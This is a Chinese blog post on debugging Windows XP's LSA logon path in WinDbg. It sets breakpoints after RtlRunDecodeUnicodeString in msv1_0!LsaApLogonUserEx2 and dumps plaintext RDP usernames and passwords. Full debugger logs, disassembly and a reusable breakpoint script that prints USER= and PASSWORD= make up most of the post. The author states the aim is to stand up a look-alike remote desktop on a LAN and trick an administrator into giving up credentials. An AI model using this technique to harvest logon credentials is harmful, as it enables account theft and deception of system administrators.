注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

远程桌面测试得到帐号及密码  

2014-03-06 10:42:52|  分类: 调试记录 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

因为本地登录以及远程登录的验证都要通过msv1_0!LsaApLogonUserEx2这个函数。

所以可以通过对msv1_0!LsaApLogonUserEx2这个函数下断点得到它的帐号及密码。

但是这个函数参数比较多,还有一些数据是加密的,所以不太直观。

以前对文本框以及密码框做过一个小测试,有密码的话都要调用

ntdll.RtlRunEncodeUnicodeString加密,调用ntdll.RtlRunDecodeUnicodeString解密。

所以我们可以通过这两个函数下断点,来得到他们的参数,他们的参数比较简单。

这里是RtlRunDecodeUnicodeString,在它解密后就可以看到帐号密码了。

做这个测试的目的是为了验证局域网搭建一个跟目标一样的远程桌面,在管理员

登录远程桌面关机时,骗到帐号密码信息。

我们搭建一个虚拟机并windbg调试,下个调试断点,并输出到记录文件即可。

这个例子中我们可以如下:

 kd> .logopen c:\temp\rdp2.log
Opened log file 'c:\temp\rdp2.log'
kd> bp 77c49ab0  ".echo ===dump===;db edi;g"
kd> bl
 0 e 77c49aaa     0001 (0001) msv1_0!LsaApLogonUserEx2+0xa94 "dd esp l4"
 1 e 77c49ab0     0001 (0001) msv1_0!LsaApLogonUserEx2+0xa9a ".echo ===dump===;db edi;g"

kd> bd 0
kd> g
===dump===
000de2e4  18 00 18 00 10 e3 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000de2f4  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000de304  72 00 00 00 56 00 58 00-50 00 00 00 31 00 31 00  r...V.X.P...1.1.
000de314  31 00 32 00 32 00 32 00-33 00 33 00 33 00 34 00  1.2.2.2.3.3.3.4.
000de324  34 00 34 00 00 00 00 00-00 00 00 00 00 00 00 00  4.4.............
000de334  55 00 53 00 0e 00 0e 00-1c 01 0c 00 00 00 00 00  U.S.............
000de344  48 00 00 00 58 00 00 00-00 00 00 00 14 00 00 00  H...X...........
000de354  02 00 34 00 02 00 00 00-00 00 18 00 03 00 0f 00  ..4.............
===dump===
000dda84  14 00 14 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 78 00 70 00  r...V.X.P...x.p.
000ddab4  78 00 70 00 72 00 64 00-70 00 72 00 64 00 70 00  x.p.r.d.p.r.d.p.
000ddac4  00 00 00 00 00 00 00 00-00 00 0d 00 16 00 0d 00  ................
000ddad4  21 01 0c 00 00 00 00 00-66 77 5e 66 04 00 00 00  !.......fw^f....
000ddae4  16 00 16 00 18 db 0d 00-06 00 06 00 2e db 0d 00  ................
000ddaf4  16 00 16 00 34 db 0d 00-5f cc e0 f5 f8 4c 22 e7  ....4..._....L".
===dump===
000dda84  10 00 10 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 74 00 65 00  r...V.X.P...t.e.
000ddab4  73 00 74 00 65 00 74 00-73 00 74 00 00 00 00 00  s.t.e.t.s.t.....
000ddac4  00 00 00 00 00 00 00 00-00 00 0d 00 16 00 0d 00  ................
000ddad4  21 01 0c 00 00 00 00 00-66 77 5e 66 04 00 00 00  !.......fw^f....
000ddae4  16 00 16 00 18 db 0d 00-06 00 06 00 2e db 0d 00  ................
000ddaf4  16 00 16 00 34 db 0d 00-59 b0 f0 84 66 8d 53 6f  ....4...Y...f.So
===dump===
000d3c9c  0c 00 0c 00 c8 3c 0d 00-41 00 64 00 6d 00 69 00  .....<..A.d.m.i.
000d3cac  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000d3cbc  72 00 00 00 56 00 58 00-50 00 00 00 31 00 31 00  r...V.X.P...1.1.
000d3ccc  31 00 33 00 33 00 33 00-00 00 00 00 00 00 00 00  1.3.3.3.........
000d3cdc  00 00 00 00 03 00 0c 00-e7 01 0a 00 a0 3b 0d 00  .............;..
000d3cec  6c 00 69 00 63 00 79 00-00 00 00 00 2b 00 03 00  l.i.c.y.....+...
000d3cfc  e4 01 0c 00 10 7b e5 77-ef cd ab 89 00 10 00 00  .....{.w........
000d3d0c  01 00 00 00 06 1c 25 81-00 00 00 00 71 4e c8 44  ......%.....qN.D
===dump===
000dda84  16 00 16 00 ac da 0d 00-75 00 75 00 75 00 75 00  ........u.u.u.u.
000dda94  75 00 75 00 75 00 75 00-75 00 75 00 75 00 00 00  u.u.u.u.u.u.u...
000ddaa4  56 00 58 00 50 00 00 00-37 00 37 00 37 00 37 00  V.X.P...7.7.7.7.
000ddab4  37 00 37 00 37 00 37 00-37 00 37 00 37 00 00 00  7.7.7.7.7.7.7...
000ddac4  00 00 00 00 00 00 00 00-00 00 0d 00 16 00 0d 00  ................
000ddad4  21 01 0c 00 00 00 00 00-66 77 5e 66 04 00 00 00  !.......fw^f....
000ddae4  16 00 16 00 18 db 0d 00-06 00 06 00 2e db 0d 00  ................
000ddaf4  16 00 16 00 34 db 0d 00-d3 9f bd ea c1 29 e1 a0  ....4........)..
===dump===
000d3c9c  14 00 14 00 be 3c 0d 00-75 00 75 00 75 00 75 00  .....<..u.u.u.u.
000d3cac  73 00 65 00 72 00 72 00-00 00 56 00 58 00 50 00  s.e.r.r...V.X.P.
000d3cbc  00 00 32 00 32 00 32 00-32 00 32 00 32 00 32 00  ..2.2.2.2.2.2.2.
000d3ccc  32 00 32 00 32 00 00 00-00 00 00 00 00 00 00 00  2.2.2...........
000d3cdc  00 00 00 00 03 00 0c 00-e7 01 0c 00 a0 3b 0d 00  .............;..
000d3cec  00 00 00 00 b4 00 00 00-00 00 00 00 2b 00 03 00  ............+...
000d3cfc  e4 01 0c 00 10 7b e5 77-ef cd ab 89 00 10 00 00  .....{.w........
000d3d0c  01 00 00 00 06 1c 25 81-00 00 00 00 71 4e c8 44  ......%.....qN.D

下面是一些调试记录

kd> ***************
kd> ub . l20
msv1_0!LsaApLogonUserEx2+0x8d0:
001b:77c49a2c 6689430e        mov     word ptr [ebx+0Eh],ax
001b:77c49a30 8b4318          mov     eax,dword ptr [ebx+18h]
001b:77c49a33 668b0f          mov     cx,word ptr [edi]
001b:77c49a36 3bc6            cmp     eax,esi
001b:77c49a38 0f841a3f0000    je      msv1_0!LsaApLogonUserEx2+0x8de (77c4d958)
001b:77c49a3e 663bce          cmp     cx,si
001b:77c49a41 0f841f3f0000    je      msv1_0!LsaApLogonUserEx2+0x8ed (77c4d966)
001b:77c49a47 2b4514          sub     eax,dword ptr [ebp+14h]
001b:77c49a4a 898580f9ffff    mov     dword ptr [ebp-680h],eax
001b:77c49a50 3b4518          cmp     eax,dword ptr [ebp+18h]
001b:77c49a53 0f83813b0000    jae     msv1_0!LsaApLogonUserEx2+0x2d7 (77c4d5da)
001b:77c49a59 0fb7d1          movzx   edx,cx
001b:77c49a5c 03d0            add     edx,eax
001b:77c49a5e 3b5518          cmp     edx,dword ptr [ebp+18h]
001b:77c49a61 0f87733b0000    ja      msv1_0!LsaApLogonUserEx2+0x2d7 (77c4d5da)
001b:77c49a67 8bd0            mov     edx,eax
001b:77c49a69 f7d2            not     edx
001b:77c49a6b f6c201          test    dl,1
001b:77c49a6e 0f84663b0000    je      msv1_0!LsaApLogonUserEx2+0x2d7 (77c4d5da)
001b:77c49a74 03c3            add     eax,ebx
001b:77c49a76 894318          mov     dword ptr [ebx+18h],eax
001b:77c49a79 66894b16        mov     word ptr [ebx+16h],cx
001b:77c49a7d 8b8544faffff    mov     eax,dword ptr [ebp-5BCh]
001b:77c49a83 66833802        cmp     word ptr [eax],2
001b:77c49a87 0f86e13e0000    jbe     msv1_0!LsaApLogonUserEx2+0x934 (77c4d96e)
001b:77c49a8d 837d0c05        cmp     dword ptr [ebp+0Ch],5
001b:77c49a91 0f844d3f0000    je      msv1_0!LsaApLogonUserEx2+0x9a7 (77c4d9e4)
001b:77c49a97 80bdecf9ffff00  cmp     byte ptr [ebp-614h],0
001b:77c49a9e 7414            je      msv1_0!LsaApLogonUserEx2+0xa9e (77c49ab4)
001b:77c49aa0 8975fc          mov     dword ptr [ebp-4],esi
001b:77c49aa3 57              push    edi <===这个参数附近有帐号密码信息
001b:77c49aa4 ffb5ecf9ffff    push    dword ptr [ebp-614h]
kd> u
msv1_0!LsaApLogonUserEx2+0xa94:
001b:77c49aaa ff153012c477    call    dword ptr [msv1_0!_imp__RtlRunDecodeUnicodeString (77c41230)] <===中断在这行
001b:77c49ab0 834dfcff        or      dword ptr [ebp-4],0FFFFFFFFh <===步过上面那个调用,edi参数指向帐号密码
001b:77c49ab4 ffb548faffff    push    dword ptr [ebp-5B8h]
001b:77c49aba 8d8558faffff    lea     eax,[ebp-5A8h]
001b:77c49ac0 50              push    eax
001b:77c49ac1 ff15c811c477    call    dword ptr [msv1_0!_imp__RtlCopyUnicodeString (77c411c8)]
001b:77c49ac7 397308          cmp     dword ptr [ebx+8],esi
001b:77c49aca 7413            je      msv1_0!LsaApLogonUserEx2+0xac9 (77c49adf)
kd> ***********
kd> kn
 # ChildEBP RetAddr 
00 00b0fc8c 744a78f4 msv1_0!LsaApLogonUserEx2+0xa94
01 00b0fcf8 74492891 LSASRV!NegLogonUserEx2+0x22d
02 00b0fe98 744922ae LSASRV!LsapAuApiDispatchLogonUser+0x33b
03 00b0feac 74489481 LSASRV!LpcLsaLogonUser+0x22
04 00b0fec4 744893a5 LSASRV!DispatchAPI+0x46
05 00b0ff50 74488cfa LSASRV!LpcHandler+0x153
06 00b0ff74 74488dbe LSASRV!SpmPoolThreadBase+0xb9
07 00b0ffb4 7c80b729 LSASRV!LsapThreadBase+0x91
08 00b0ffec 00000000 kernel32!BaseThreadStart+0x37
kd> dd esp l8
00b0f460  006c006f 【000dda84】 00b0fe6c 00000001
00b0f470  7c809c65 00000000 00000000 00000000
kd> db poi(@esp+4)
【000dda84】  12 00 12 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 5e 31 6f 00  r...V.X.P...^1o.
000ddab4  5e 31 6c 03 5e 31 6c 03-5f 30 6c 03 5f 30 00 00  ^1l.^1l._0l._0..
000ddac4  00 00 00 00 00 00 00 00-78 44 0d 00 16 00 0d 00  ........xD......
000ddad4  21 01 08 00 00 00 00 00-5c 00 57 00 49 00 4e 00  !.......\.W.I.N.
000ddae4  44 00 4f 00 57 00 53 00-5c 00 73 00 79 00 73 00  D.O.W.S.\.s.y.s.
000ddaf4  74 00 65 00 6d 00 33 00-32 00 5c 00 4d 00 69 00  t.e.m.3.2.\.M.i.
kd> r
eax=000dda74 ebx=000dda70 ecx=ffff0012 edx=ffffffbf esi=00000000 edi=000dda84
eip=77c49aaa esp=00b0f460 ebp=00b0fc8c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
msv1_0!LsaApLogonUserEx2+0xa94:
001b:77c49aaa ff153012c477    call    dword ptr [msv1_0!_imp__RtlRunDecodeUnicodeString (77c41230)] ds:0023:77c41230={ntdll!RtlRunDecodeUnicodeString (7c950821)}
kd> pr
eax=000ddab2 ebx=000dda70 ecx=ffff006f edx=ffffff00 esi=00000000 edi=000dda84
eip=77c49ab0 esp=00b0f468 ebp=00b0fc8c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
msv1_0!LsaApLogonUserEx2+0xa9a:
001b:77c49ab0 834dfcff        or      dword ptr [ebp-4],0FFFFFFFFh ss:0023:00b0fc88=00000000
kd> db edi <===可以看到帐号以及解密的密码111222333了!
【000dda84】  12 00 12 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 31 00 31 00  r...V.X.P...1.1.
000ddab4  31 00 32 00 32 00 32 00-33 00 33 00 33 00 00 00  1.2.2.2.3.3.3...
000ddac4  00 00 00 00 00 00 00 00-78 44 0d 00 16 00 0d 00  ........xD......
000ddad4  21 01 08 00 00 00 00 00-5c 00 57 00 49 00 4e 00  !.......\.W.I.N.
000ddae4  44 00 4f 00 57 00 53 00-5c 00 73 00 79 00 73 00  D.O.W.S.\.s.y.s.
000ddaf4  74 00 65 00 6d 00 33 00-32 00 5c 00 4d 00 69 00  t.e.m.3.2.\.M.i.


【补充一个windbg脚本 2014.5.6】

*pwd_vxp.x

.logappend c:\temp\logs\vxp.log
*vxp Login Test!
*r @$t0=0
*bp 77c49ab0 ".echo ===dump===;db edi;j (@$t0==1) '';'r @$t0=@$t0+1;gc'"
*bp 77c49ab0 ".echo ===dump===;db edi"
*bp 77c49ab0 ".echo ===dump===;db edi;.echo user=;du edi+8;.echo password=;dS edi"
bp 77c49ab0 ".echo ===dump===;db @edi;.printf \"USER= %mu\n\",@edi+8;.echo;.printf \"PASSWORD= %msu\n\",@edi;.echo"

  评论这张
 
阅读(349)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017